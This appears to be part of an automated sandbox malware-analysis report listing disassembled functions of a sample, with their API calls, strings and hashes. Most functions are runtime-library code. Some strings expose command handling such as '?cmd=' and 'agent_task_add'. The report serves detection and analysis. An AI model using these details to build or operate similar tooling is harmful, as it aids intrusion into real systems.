                                                                  • API String ID: 2621100827-68959868
                                                                  • Opcode ID: eff2206f4909ef7f00548ec5c40d9041846c228344b7a7bf0811809fc827db25
                                                                  • Instruction ID: 63f6167787b5849e1bf8a21454d71ba3d6dd6c242267a25200910bc6f432d0b2
                                                                  • Opcode Fuzzy Hash: eff2206f4909ef7f00548ec5c40d9041846c228344b7a7bf0811809fc827db25
                                                                  • Instruction Fuzzy Hash: 52316BB1A00204CFCB10DFA8D881B9AB7F4FF88314F148A6EE555A7781D738A904CBA4
                                                                  Function 0041C5B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 0041C5C1
                                                                    • Part of subcall function 00415170: __FF_MSGBANNER.LIBCMT ref: 00415189
                                                                    • Part of subcall function 00415170: __NMSG_WRITE.LIBCMT ref: 00415190
                                                                    • Part of subcall function 00415170: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00416F22,?,00000001,?,?,0041B525,00000018,0042D5F0,0000000C,0041B5B5), ref: 004151B5
                                                                  • _free.LIBCMT ref: 0041C5D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap_free_malloc
                                                                  • String ID: AcB
                                                                  • API String ID: 2734353464-1478174269
                                                                  • Opcode ID: 8b6c01779e3b714c63fddf65fb88cc6ff26c2e2c4537bd79e95977f20cc853d5
                                                                  • Instruction ID: 3fbff88a0494120e4650b485aa6fdb2f7ac20307385e551b3c582f91f470e137
                                                                  • Opcode Fuzzy Hash: 8b6c01779e3b714c63fddf65fb88cc6ff26c2e2c4537bd79e95977f20cc853d5
                                                                  • Instruction Fuzzy Hash: 4F11E732984214ABCB212B75BC457DB3B959F843A4F20152BF80597251DF7C89D19A9C
                                                                  Function 00416714 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0042D4B8,00000008,0041681C,00000000,00000000,?,?,00414408,004136EF), ref: 00416725
                                                                  • __lock.LIBCMT ref: 00416759
                                                                    • Part of subcall function 0041B59A: __mtinitlocknum.LIBCMT ref: 0041B5B0
                                                                    • Part of subcall function 0041B59A: __amsg_exit.LIBCMT ref: 0041B5BC
                                                                    • Part of subcall function 0041B59A: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041675E,0000000D), ref: 0041B5C4
                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00416766
                                                                  • __lock.LIBCMT ref: 0041677A
                                                                  • ___addlocaleref.LIBCMT ref: 00416798
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                  • String ID: KERNEL32.DLL
                                                                  • API String ID: 637971194-2576044830
                                                                  • Opcode ID: cf9044d909a80a9cd1ff4a26ba37dc503059a3b1c36592aa200a094437635a16
                                                                  • Instruction ID: 2a005e2a26b7ca0d99b70be6941c5cde8c8a031a6340c38cdbef76149252a918
                                                                  • Opcode Fuzzy Hash: cf9044d909a80a9cd1ff4a26ba37dc503059a3b1c36592aa200a094437635a16
                                                                  • Instruction Fuzzy Hash: BE016571544704DFD720AF66D846789BBE0BF50318F10854FE8A5563D1CBB8A680CB19
                                                                  Function 00405540 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 232stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?cmd=,-000000F0,00000000,00424AC8,000000FF,?,0040530B,00000001,00000000,00000000,?,0000000D,?,00000001), ref: 004055A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: '%s' is not a recognized command$'%s' is not a recognized command Id$'%s' is not a valid command line$?cmd=$Failed to set parameters for command %s. %s
                                                                  • API String ID: 1659193697-3601394813
                                                                  • Opcode ID: a6b82354fa24fe632ef5d29c7df6978a5f1a493634a230fd05eafbcfe10ffe30
                                                                  • Instruction ID: 798868e04bc199de5828f86eb8defdc8c90eec0ebd6dcdaa2e18cfd21095d804
                                                                  • Opcode Fuzzy Hash: a6b82354fa24fe632ef5d29c7df6978a5f1a493634a230fd05eafbcfe10ffe30
                                                                  • Instruction Fuzzy Hash: 3C81F371A006059FCB10DFA8C885A9FB7B1EF44324F24466EE855A73D1DB38AD01CFA8
                                                                  Function 004113D0 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • AllocConsole.KERNEL32(00000000,?,?,?,?,?,?,?,004118D1,00404392,?,?,?,00000004,00000001,00403CC0), ref: 004113E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: AllocConsole
                                                                  • String ID:
                                                                  • API String ID: 4167703944-0
                                                                  • Opcode ID: 76ecdf4abb5c9d6e4730d336aa4ed42852a12889e33b42b6854653d10d150544
                                                                  • Instruction ID: f94551d0b180acb98bca3c25dca5fd75217ec5d2b91c6eebe384a79b1f0ad324
                                                                  • Opcode Fuzzy Hash: 76ecdf4abb5c9d6e4730d336aa4ed42852a12889e33b42b6854653d10d150544
                                                                  • Instruction Fuzzy Hash: 28217E73E4031467DF20A6752C43BEB3348AB45715F04069AFF18EB2C1EA5D988683ED
                                                                  Function 00415E97 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 00415EA3
                                                                    • Part of subcall function 00416841: __getptd_noexit.LIBCMT ref: 00416844
                                                                    • Part of subcall function 00416841: __amsg_exit.LIBCMT ref: 00416851
                                                                  • __amsg_exit.LIBCMT ref: 00415EC3
                                                                  • __lock.LIBCMT ref: 00415ED3
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00415EF0
                                                                  • _free.LIBCMT ref: 00415F03
                                                                  • InterlockedIncrement.KERNEL32(004304F8), ref: 00415F1B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                  • String ID:
                                                                  • API String ID: 3470314060-0
                                                                  • Opcode ID: 64aacbd154439050355b0105d418cfbe868bba507bb6dff041487b75a4529be2
                                                                  • Instruction ID: 666f727ee5236ad751bbd60f5143e2be873cd4defde857ce3df78ec67e0369fb
                                                                  • Opcode Fuzzy Hash: 64aacbd154439050355b0105d418cfbe868bba507bb6dff041487b75a4529be2
                                                                  • Instruction Fuzzy Hash: 1301C031E05B19EBDB21AB6598467DA73A0BF84714F15011BEC10A7381DB3CAAC2DBDD
                                                                  Function 00403560 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 231COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,9C2039C9,00000000,?,00000001), ref: 004035A3
                                                                  • _wcsrchr.LIBCMT ref: 004035B6
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,00000001), ref: 004035CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectoryFileModuleName_wcsrchr
                                                                  • String ID: log$register
                                                                  • API String ID: 603228450-1130157763
                                                                  • Opcode ID: 08ef2cd8552d64b021087630f6c97d8c3824145298a4f84e84184ce598c96753
                                                                  • Instruction ID: 107d6a80d698f550d366be7666382815e05da8c8a50b4613ac0a3b839ff3cd87
                                                                  • Opcode Fuzzy Hash: 08ef2cd8552d64b021087630f6c97d8c3824145298a4f84e84184ce598c96753
                                                                  • Instruction Fuzzy Hash: FF91E3B1601605AFC714DFA8CC45B9AB7B9FF88324F1482A9E4199B2D1DB34EE44CF94
                                                                  Function 00405400 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402A90: __wcsicoll.LIBCMT ref: 00402AB3
                                                                    • Part of subcall function 00402A90: __wcsicoll.LIBCMT ref: 00402AEF
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405515
                                                                  Strings
                                                                  • taskId=TASK_LAUNCH_VAULT&allowDuplicates=1, xrefs: 004054AB
                                                                  • list<T> too long, xrefs: 00405510
                                                                  • '%s' is not a recognized command Id, xrefs: 0040546F
                                                                  • agent_task_add, xrefs: 00405435
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll$Xinvalid_argumentstd::_
                                                                  • String ID: '%s' is not a recognized command Id$agent_task_add$list<T> too long$taskId=TASK_LAUNCH_VAULT&allowDuplicates=1
                                                                  • API String ID: 738070571-3830114783
                                                                  • Opcode ID: 73d2313ef4ca0c44209152350d997199626b350e51a2dc92e81e401f3a4541fc
                                                                  • Instruction ID: 2877e8e1ee730d82884497b78d13055ad23c509a160683405d2cfcdd003b873f
                                                                  • Opcode Fuzzy Hash: 73d2313ef4ca0c44209152350d997199626b350e51a2dc92e81e401f3a4541fc
                                                                  • Instruction Fuzzy Hash: 8441C3716006059FC704DFA8D941AAAB7B4FF85324F10836EE426A73D1D734AE40CF94
                                                                  Function 00413B9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 00413BB6
                                                                    • Part of subcall function 00415170: __FF_MSGBANNER.LIBCMT ref: 00415189
                                                                    • Part of subcall function 00415170: __NMSG_WRITE.LIBCMT ref: 00415190
                                                                    • Part of subcall function 00415170: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00416F22,?,00000001,?,?,0041B525,00000018,0042D5F0,0000000C,0041B5B5), ref: 004151B5
                                                                  • std::exception::exception.LIBCMT ref: 00413BEB
                                                                  • std::exception::exception.LIBCMT ref: 00413C05
                                                                  • __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                                                  • String ID: xsB
                                                                  • API String ID: 1414122017-962849395
                                                                  • Opcode ID: 71bb43113b03fda9e75c22da8486a42dfa7a218c335d59594391c918980907c1
                                                                  • Instruction ID: 6a8bc27a46bf097875d484f5a0b5e3f95a16b6a6685c49e19060bb533e89cc82
                                                                  • Opcode Fuzzy Hash: 71bb43113b03fda9e75c22da8486a42dfa7a218c335d59594391c918980907c1
                                                                  • Instruction Fuzzy Hash: 7AF0F975604215AACB00EF55EC02AEDB6A46F40758F50006FFC05A61E1EB7CAB84864D
                                                                  Function 00404FD0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 342stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(eadcommand:,?,00000001,00403CC0,00000000,00000001,00000001,00000001), ref: 00405090
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: %20-$?cmd=$Could not find '%s' in command line: '%s'$eadcommand:
                                                                  • API String ID: 1659193697-2334872083
